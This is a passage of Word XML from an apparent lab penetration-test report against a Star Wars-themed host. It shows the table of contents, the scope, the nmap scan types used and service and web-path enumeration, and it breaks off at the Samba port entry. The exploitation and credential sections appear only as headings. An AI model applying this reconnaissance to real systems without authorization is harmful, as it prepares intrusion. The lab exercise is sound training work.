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EDCAE31" w14:textId="77777777" w:rsidR="0049075E" w:rsidRDefault="0049075E"/>
    <w:p w14:paraId="793F9E79" w14:textId="77777777" w:rsidR="0049075E" w:rsidRDefault="0049075E"/>
    <w:p w14:paraId="1FE7EB93" w14:textId="77777777" w:rsidR="0049075E" w:rsidRDefault="0049075E"/>
    <w:p w14:paraId="3E3D0204" w14:textId="77777777" w:rsidR="0049075E" w:rsidRDefault="0049075E"/>
    <w:p w14:paraId="5367D3B0" w14:textId="77777777" w:rsidR="0049075E" w:rsidRDefault="0049075E"/>
    <w:p w14:paraId="59D0339D" w14:textId="77777777" w:rsidR="0049075E" w:rsidRDefault="0049075E"/>
    <w:p w14:paraId="24B02EF4" w14:textId="77777777" w:rsidR="0049075E" w:rsidRDefault="0049075E"/>
    <w:p w14:paraId="029A918F" w14:textId="77777777" w:rsidR="0049075E" w:rsidRDefault="0049075E"/>
    <w:p w14:paraId="60674B09" w14:textId="77777777" w:rsidR="0049075E" w:rsidRDefault="0049075E"/>
    <w:p w14:paraId="75CE109D" w14:textId="77777777" w:rsidR="0049075E" w:rsidRDefault="0049075E"/>
    <w:p w14:paraId="7256240B" w14:textId="77777777" w:rsidR="0049075E" w:rsidRDefault="0049075E"/>
    <w:p w14:paraId="56A8839E" w14:textId="77777777" w:rsidR="0049075E" w:rsidRDefault="0049075E"/>
    <w:p w14:paraId="719C88B4" w14:textId="77777777" w:rsidR="0049075E" w:rsidRDefault="0049075E" w:rsidP="0049075E">
      <w:pPr>
        <w:pStyle w:val="Title"/>
      </w:pPr>
      <w:r w:rsidRPr="0049075E">
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251658240" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="30E7AA2B" wp14:editId="36484912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3665855" cy="2851150"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapSquare wrapText="bothSides"/>
            <wp:docPr id="1" name="Picture 1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close up of a logo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5855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9075E">
        <w:t>DEATH STAR DATA ACQUISITION REPORT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24527184" w14:textId="77777777" w:rsidR="0049075E" w:rsidRDefault="0049075E" w:rsidP="0049075E">
      <w:pPr>
        <w:pStyle w:val="Subtitle"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3A1CCA05" w14:textId="77777777" w:rsidR="00F5666E" w:rsidRDefault="00402358" w:rsidP="00402358">
      <w:pPr>
        <w:pStyle w:val="Subtitle"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:t>Mason Soroka-Gill (SOROM2)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58F22405" w14:textId="507881EA" w:rsidR="0049075E" w:rsidRDefault="0049075E" w:rsidP="00F5666E">
      <w:pPr>
        <w:pStyle w:val="Subtitle"/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NZ"/>
        </w:rPr>
        <w:id w:val="134073728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7F2BCE4" w14:textId="2D7977C9" w:rsidR="00A81612" w:rsidRDefault="00A81612">
          <w:pPr>
            <w:pStyle w:val="TOCHeading"/>
          </w:pPr>
          <w:r>
            <w:t>Table of Contents</w:t>
          </w:r>
        </w:p>
        <w:p w14:paraId="02CCCBA1" w14:textId="4849574C" w:rsidR="00EC4FB2" w:rsidRDefault="002547A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r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> TOC \o \h \z \u </w:instrText>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:hyperlink w:anchor="_Toc49875721" w:history="1">
            <w:r w:rsidR="00EC4FB2" w:rsidRPr="007F2B70">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Scope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_Toc49875721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3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05AC8362" w14:textId="57A4FB0D" w:rsidR="00EC4FB2" w:rsidRDefault="00F6289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22" w:history="1">
            <w:r w:rsidR="00EC4FB2" w:rsidRPr="007F2B70">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>IP Addresses and Domains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_Toc49875722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3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4638FA4E" w14:textId="33019C58" w:rsidR="00EC4FB2" w:rsidRDefault="00F6289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23" w:history="1">
            <w:r w:rsidR="00EC4FB2" w:rsidRPr="007F2B70">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Scanning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_Toc49875723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4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12E7598C" w14:textId="27DFDAD1" w:rsidR="00EC4FB2" w:rsidRDefault="00F6289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24" w:history="1">
            <w:r w:rsidR="00EC4FB2" w:rsidRPr="007F2B70">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Ports and Versions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_Toc49875724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4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50630489" w14:textId="0FD0FBD0" w:rsidR="00EC4FB2" w:rsidRDefault="00F6289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25" w:history="1">
            <w:r w:rsidR="00EC4FB2" w:rsidRPr="007F2B70">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Port 22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_Toc49875725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4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01B1C9D9" w14:textId="62744BFD" w:rsidR="00EC4FB2" w:rsidRDefault="00F6289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26" w:history="1">
            <w:r w:rsidR="00EC4FB2" w:rsidRPr="007F2B70">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Port 80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_Toc49875726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4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1C9947A6" w14:textId="0C72A8B5" w:rsidR="00EC4FB2" w:rsidRDefault="00F6289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27" w:history="1">
            <w:r w:rsidR="00EC4FB2" w:rsidRPr="007F2B70">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Port 139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_Toc49875727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4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3F5E7F87" w14:textId="123DFF7A" w:rsidR="00EC4FB2" w:rsidRDefault="00F6289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28" w:history="1">
            <w:r w:rsidR="00EC4FB2" w:rsidRPr="007F2B70">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Port 445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_Toc49875728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4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274F2ED1" w14:textId="53D4F553" w:rsidR="00EC4FB2" w:rsidRDefault="00F6289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29" w:history="1">
            <w:r w:rsidR="00EC4FB2" w:rsidRPr="007F2B70">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Port 3306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_Toc49875729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5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23C3DA6D" w14:textId="374E36A9" w:rsidR="00EC4FB2" w:rsidRDefault="00F6289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30" w:history="1">
            <w:r w:rsidR="00EC4FB2" w:rsidRPr="007F2B70">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Port 6667 &amp; 6697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_Toc49875730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5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2B9F3A8D" w14:textId="597861B9" w:rsidR="00EC4FB2" w:rsidRDefault="00F6289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31" w:history="1">
            <w:r w:rsidR="00EC4FB2" w:rsidRPr="007F2B70">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Port 8080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_Toc49875731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5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1695FA7B" w14:textId="3120CF17" w:rsidR="00EC4FB2" w:rsidRDefault="00F6289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32" w:history="1">
            <w:r w:rsidR="00EC4FB2" w:rsidRPr="007F2B70">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Port 8181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_Toc49875732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5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12B7108F" w14:textId="31DF0B9A" w:rsidR="00EC4FB2" w:rsidRDefault="00F6289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33" w:history="1">
            <w:r w:rsidR="00EC4FB2" w:rsidRPr="007F2B70">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Vulnerabilities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_Toc49875733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6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1403098E" w14:textId="1016E06E" w:rsidR="00EC4FB2" w:rsidRDefault="00F6289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34" w:history="1">
            <w:r w:rsidR="00EC4FB2" w:rsidRPr="007F2B70">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Port 80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_Toc49875734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6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53924AA0" w14:textId="505CF686" w:rsidR="00EC4FB2" w:rsidRDefault="00F6289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35" w:history="1">
            <w:r w:rsidR="00EC4FB2" w:rsidRPr="007F2B70">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Drupal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_Toc49875735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6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2E45C540" w14:textId="36357E8C" w:rsidR="00EC4FB2" w:rsidRDefault="00F6289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36" w:history="1">
            <w:r w:rsidR="00EC4FB2" w:rsidRPr="007F2B70">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Payrollapp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_Toc49875736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7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45ACFC05" w14:textId="0F9F329E" w:rsidR="00EC4FB2" w:rsidRDefault="00F6289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37" w:history="1">
            <w:r w:rsidR="00EC4FB2" w:rsidRPr="007F2B70">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Port 6667 &amp; 6697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_Toc49875737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9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184D2881" w14:textId="270D92B7" w:rsidR="00EC4FB2" w:rsidRDefault="00F6289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38" w:history="1">
            <w:r w:rsidR="00EC4FB2" w:rsidRPr="007F2B70">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Port 8080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_Toc49875738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11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6317AAC9" w14:textId="6A8E47ED" w:rsidR="00EC4FB2" w:rsidRDefault="00F6289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39" w:history="1">
            <w:r w:rsidR="00EC4FB2" w:rsidRPr="007F2B70">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Kernel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_Toc49875739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12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1DFFDDA1" w14:textId="2F5F4FCD" w:rsidR="00EC4FB2" w:rsidRDefault="00F6289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40" w:history="1">
            <w:r w:rsidR="00EC4FB2" w:rsidRPr="007F2B70">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Credentials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_Toc49875740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13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7BE61F95" w14:textId="60D4DB7A" w:rsidR="00EC4FB2" w:rsidRDefault="00F6289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41" w:history="1">
            <w:r w:rsidR="00EC4FB2" w:rsidRPr="007F2B70">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>/etc/shadow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_Toc49875741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13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46569CE0" w14:textId="2835B56E" w:rsidR="00EC4FB2" w:rsidRDefault="00F6289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42" w:history="1">
            <w:r w:rsidR="00EC4FB2" w:rsidRPr="007F2B70">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
                <w:lang w:eastAsia="en-NZ"/>
              </w:rPr>
              <w:t>/home/vagrant/passwords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_Toc49875742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13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03CD200F" w14:textId="0A36BB7D" w:rsidR="00EC4FB2" w:rsidRDefault="00F6289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43" w:history="1">
            <w:r w:rsidR="00EC4FB2" w:rsidRPr="007F2B70">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
                <w:lang w:eastAsia="en-NZ"/>
              </w:rPr>
              <w:t>MySQL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_Toc49875743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14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6F539B64" w14:textId="20694F93" w:rsidR="00EC4FB2" w:rsidRDefault="00F6289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44" w:history="1">
            <w:r w:rsidR="00EC4FB2" w:rsidRPr="007F2B70">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
                <w:lang w:eastAsia="en-NZ"/>
              </w:rPr>
              <w:t>/var/www/html/drupal/sites/default/settings.php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_Toc49875744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14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757D3127" w14:textId="1CF63FBA" w:rsidR="00EC4FB2" w:rsidRDefault="00F6289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45" w:history="1">
            <w:r w:rsidR="00EC4FB2" w:rsidRPr="007F2B70">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
                <w:lang w:eastAsia="en-NZ"/>
              </w:rPr>
              <w:t>/home/boba_fett/darth_vaders_password.txt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_Toc49875745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14</w:t>
            </w:r>
            <w:r w:rsidR="00EC4FB2">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="56454773" w14:textId="26F7688A" w:rsidR="00A81612" w:rsidRPr="00EC4FB2" w:rsidRDefault="00F6289A" w:rsidP="00EC4FB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49875746" w:history="1">
            <w:r w:rsidR="00EC4FB2" w:rsidRPr="007F2B70">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
                <w:lang w:eastAsia="en-NZ"/>
              </w:rPr>
              <w:t>Exfiltrated intelligence</w:t>
            </w:r>
            <w:r w:rsidR="00EC4FB2">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00EC4FB2">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00EC4FB2">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc49875746 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00EC4FB2">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00EC4FB2">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00C45F77">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>15</w:t>
            </w:r>
            <w:r w:rsidR="00EC4FB2">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidR="002547AB">
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:p>
      </w:sdtContent>
    </w:sdt>
    <w:p w14:paraId="29730FD7" w14:textId="218BA91D" w:rsidR="00D72FFB" w:rsidRDefault="00D72FFB" w:rsidP="0049075E">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="73532AC1" w14:textId="40553A99" w:rsidR="0049075E" w:rsidRDefault="00D72FFB" w:rsidP="00D72FFB">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="_Toc49374290"/>
      <w:bookmarkStart w:id="1" w:name="_Toc49875721"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Scope</w:t>
      </w:r>
      <w:bookmarkEnd w:id="0"/>
      <w:bookmarkEnd w:id="1"/>
    </w:p>
    <w:p w14:paraId="20B5C677" w14:textId="77777777" w:rsidR="00D72FFB" w:rsidRPr="00D72FFB" w:rsidRDefault="00D72FFB" w:rsidP="00D72FFB"/>
    <w:p w14:paraId="6C8B40A6" w14:textId="717C903E" w:rsidR="00D72FFB" w:rsidRDefault="00D72FFB" w:rsidP="00D72FFB">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="2" w:name="_Toc49374291"/>
      <w:bookmarkStart w:id="3" w:name="_Toc49875722"/>
      <w:r>
        <w:t>IP Addresses and Domains</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2"/>
      <w:bookmarkEnd w:id="3"/>
    </w:p>
    <w:p w14:paraId="52B68D3D" w14:textId="658E613F" w:rsidR="00D72FFB" w:rsidRDefault="00D72FFB" w:rsidP="00D72FFB">
      <w:r>
        <w:t>The target host exists as a single IP within an isolated network. No other IP addresses were targeted.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="341094F6" w14:textId="77777777" w:rsidR="004076A9" w:rsidRDefault="00D72FFB" w:rsidP="006C151A">
      <w:pPr>
        <w:pStyle w:val="Monospace"/>
        <w:ind w:firstLine="720"/>
      </w:pPr>
      <w:r w:rsidRPr="00103461">
        <w:t>10.25.100.24</w:t>
      </w:r>
      <w:r w:rsidRPr="00103461">
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00103461">
        <w:tab/>
        <w:t>death-star</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="694F1C35" w14:textId="0F18B2FF" w:rsidR="00B5053C" w:rsidRPr="00103461" w:rsidRDefault="00B5053C" w:rsidP="00A61FAB">
      <w:pPr>
        <w:pStyle w:val="Monospace"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00103461">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="1438D1A8" w14:textId="526252D5" w:rsidR="00D72FFB" w:rsidRDefault="00B5053C" w:rsidP="00B5053C">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="4" w:name="_Toc49374292"/>
      <w:bookmarkStart w:id="5" w:name="_Toc49875723"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Scanning</w:t>
      </w:r>
      <w:bookmarkEnd w:id="4"/>
      <w:bookmarkEnd w:id="5"/>
    </w:p>
    <w:p w14:paraId="2110A938" w14:textId="46C0F989" w:rsidR="00B5053C" w:rsidRDefault="00B5053C" w:rsidP="00B5053C">
      <w:r>
        <w:t>The following scans were performed on the target host:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="720267D9" w14:textId="74ED5268" w:rsidR="00B5053C" w:rsidRDefault="00B5053C" w:rsidP="00104729">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Nmap full port scan</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F7F4A2E" w14:textId="21A5CC62" w:rsidR="00104729" w:rsidRDefault="00104729" w:rsidP="00104729">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Nmap connect scan</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="116A9E09" w14:textId="7D0CC13A" w:rsidR="00104729" w:rsidRDefault="00104729" w:rsidP="00104729">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Nmap version detection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33F60917" w14:textId="1A6A23D5" w:rsidR="00104729" w:rsidRDefault="00104729" w:rsidP="00104729">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Nmap default script scanning</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="292C3E60" w14:textId="571F36E1" w:rsidR="00B5053C" w:rsidRDefault="00B5053C" w:rsidP="00B5053C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Nmap discovery scripts</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63892AEE" w14:textId="709E99C0" w:rsidR="00B5053C" w:rsidRDefault="00B5053C" w:rsidP="00B5053C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Nmap vuln scrip</w:t>
      </w:r>
      <w:r w:rsidR="00FE7E46">
        <w:t>t</w:t>
      </w:r>
      <w:r>
        <w:t>s</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F7D45E7" w14:textId="43D8DDEA" w:rsidR="00104729" w:rsidRDefault="00104729" w:rsidP="00104729">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="6" w:name="_Toc49374293"/>
      <w:bookmarkStart w:id="7" w:name="_Toc49875724"/>
      <w:r>
        <w:t>Ports and Versions</w:t>
      </w:r>
      <w:bookmarkEnd w:id="6"/>
      <w:bookmarkEnd w:id="7"/>
    </w:p>
    <w:p w14:paraId="71C62F6C" w14:textId="58D4AB7E" w:rsidR="00104729" w:rsidRDefault="00104729" w:rsidP="00104729">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="8" w:name="_Toc49374294"/>
      <w:bookmarkStart w:id="9" w:name="_Toc49875725"/>
      <w:r>
        <w:t>Port 22</w:t>
      </w:r>
      <w:bookmarkEnd w:id="8"/>
      <w:bookmarkEnd w:id="9"/>
    </w:p>
    <w:p w14:paraId="71C3EB65" w14:textId="32584181" w:rsidR="00104729" w:rsidRDefault="00104729" w:rsidP="00104729">
      <w:r>
        <w:t>This port is running OpenSSH version 6.6.1p1 Ubuntu 2Ubuntu2.10</w:t>
      </w:r>
      <w:r w:rsidR="00F2489E">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A68887F" w14:textId="07493ED1" w:rsidR="00300AFA" w:rsidRDefault="00104729" w:rsidP="00104729">
      <w:r>
        <w:t>As of the date of this report, there are no known remote vulnerabilities for this version of OpenSSH.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C243FB2" w14:textId="4CDFE8A6" w:rsidR="00780ECA" w:rsidRDefault="00780ECA" w:rsidP="00780ECA">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="10" w:name="_Toc49374295"/>
      <w:bookmarkStart w:id="11" w:name="_Toc49875726"/>
      <w:r>
        <w:t>Port 80</w:t>
      </w:r>
      <w:bookmarkEnd w:id="10"/>
      <w:bookmarkEnd w:id="11"/>
    </w:p>
    <w:p w14:paraId="44ECFC4D" w14:textId="7ED5BF69" w:rsidR="00780ECA" w:rsidRDefault="00780ECA" w:rsidP="00780ECA">
      <w:r>
        <w:t>This port is running Apache httpd version 2.4.7</w:t>
      </w:r>
      <w:r w:rsidR="00F2489E">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="691D1F45" w14:textId="0B3C7325" w:rsidR="00F2489E" w:rsidRDefault="00F2489E" w:rsidP="00780ECA">
      <w:r>
        <w:t>As of the date of this report, there are no known remote vulnerabilities for this version of Apache.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2919FD74" w14:textId="63695469" w:rsidR="00F2489E" w:rsidRDefault="00F2489E" w:rsidP="00780ECA">
      <w:r>
        <w:t xml:space="preserve">Nmap </w:t>
      </w:r>
      <w:r w:rsidR="006B333A">
        <w:t>scripts were able to discover the following subdirectories and files:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00862A19" w14:textId="355B70A8" w:rsidR="00F2489E" w:rsidRDefault="00F6289A" w:rsidP="00F2489E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:hyperlink r:id="rId9" w:history="1">
        <w:r w:rsidR="00F2489E" w:rsidRPr="00646608">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>http://10.25.100.24:80/drupal/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="40103243" w14:textId="3A632CCD" w:rsidR="00F2489E" w:rsidRDefault="00F6289A" w:rsidP="00F2489E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:hyperlink r:id="rId10" w:history="1">
        <w:r w:rsidR="00F2489E" w:rsidRPr="00646608">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>http://10.25.100.24:80/payroll_app.php</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="453BA15E" w14:textId="50484047" w:rsidR="00F2489E" w:rsidRDefault="00F6289A" w:rsidP="006B333A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:hyperlink r:id="rId11" w:history="1">
        <w:r w:rsidR="00F2489E" w:rsidRPr="00646608">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>http://10.25.100.24:80/phpmyadmin/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="05CBAB4C" w14:textId="2263F4D5" w:rsidR="00F2489E" w:rsidRDefault="00F6289A" w:rsidP="00F2489E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:hyperlink r:id="rId12" w:history="1">
        <w:r w:rsidR="00F2489E" w:rsidRPr="00646608">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>http://10.25.100.24:80/uploads/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="3A695CE8" w14:textId="01FF2665" w:rsidR="00F2489E" w:rsidRDefault="00F6289A" w:rsidP="00F2489E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:hyperlink r:id="rId13" w:history="1">
        <w:r w:rsidR="00F2489E" w:rsidRPr="00646608">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>http://10.25.100.24:80/chat/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="1457823E" w14:textId="718EBF4B" w:rsidR="00300AFA" w:rsidRPr="00FE70B0" w:rsidRDefault="00F6289A" w:rsidP="00EA1F7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</w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId14" w:history="1">
        <w:r w:rsidR="006B333A" w:rsidRPr="00646608">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>http://10.25.100.24:80/icons/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="0C4D86D4" w14:textId="389E65B2" w:rsidR="00FE70B0" w:rsidRPr="00FE70B0" w:rsidRDefault="00F6289A" w:rsidP="00FE70B0">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:color w:val="auto"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Port_80" w:history="1">
        <w:r w:rsidR="00FE70B0" w:rsidRPr="00FE70B0">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>Vulnerabilities section</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="6F34B023" w14:textId="535617C3" w:rsidR="00CB502F" w:rsidRPr="00CB502F" w:rsidRDefault="00CB502F" w:rsidP="00CB502F">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="12" w:name="_Toc49875727"/>
      <w:r>
        <w:t>Port 139</w:t>
      </w:r>
      <w:bookmarkEnd w:id="12"/>
    </w:p>
    <w:p w14:paraId="254972D6" w14:textId="582F265C" w:rsidR="00CB502F" w:rsidRDefault="00CB502F" w:rsidP="00CB502F">
      <w:r>
        <w:t>This port is the NetBIOS port, often used in SMB/Samba systems as part of an LDAP environment.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23DF6952" w14:textId="5F1323B1" w:rsidR="00CB502F" w:rsidRDefault="00CB502F" w:rsidP="00CB502F">
      <w:r>
        <w:t xml:space="preserve">Nmap </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>nbstat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> script was able to enumerate the NetBIOS name of the host:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C04E6FB" w14:textId="73C97619" w:rsidR="00CB502F" w:rsidRDefault="00CB502F" w:rsidP="00E63CDB">
      <w:pPr>
        <w:pStyle w:val="Monospace"/>
        <w:ind w:firstLine="720"/>
      </w:pPr>
      <w:r>
        <w:t>DEATH-STAR</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12C49126" w14:textId="0059FF81" w:rsidR="00930AEE" w:rsidRDefault="00930AEE" w:rsidP="00930AEE">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="13" w:name="_Toc49875728"/>
      <w:r>
        <w:t>Port 445</w:t>
      </w:r>
      <w:bookmarkEnd w:id="13"/>
    </w:p>
    <w:p w14:paraId="17ABB1DC" w14:textId="5F6783A2" w:rsidR="00930AEE" w:rsidRDefault="00930AEE" w:rsidP="00930AEE">
      <w:r>
        <w:t xml:space="preserve">This port is running Linux Samba version </w:t>
      </w:r>
      <w:r w:rsidRPr="00930AEE">
        <w:t>4.3.11-Ubuntu</w:t>
      </w:r>
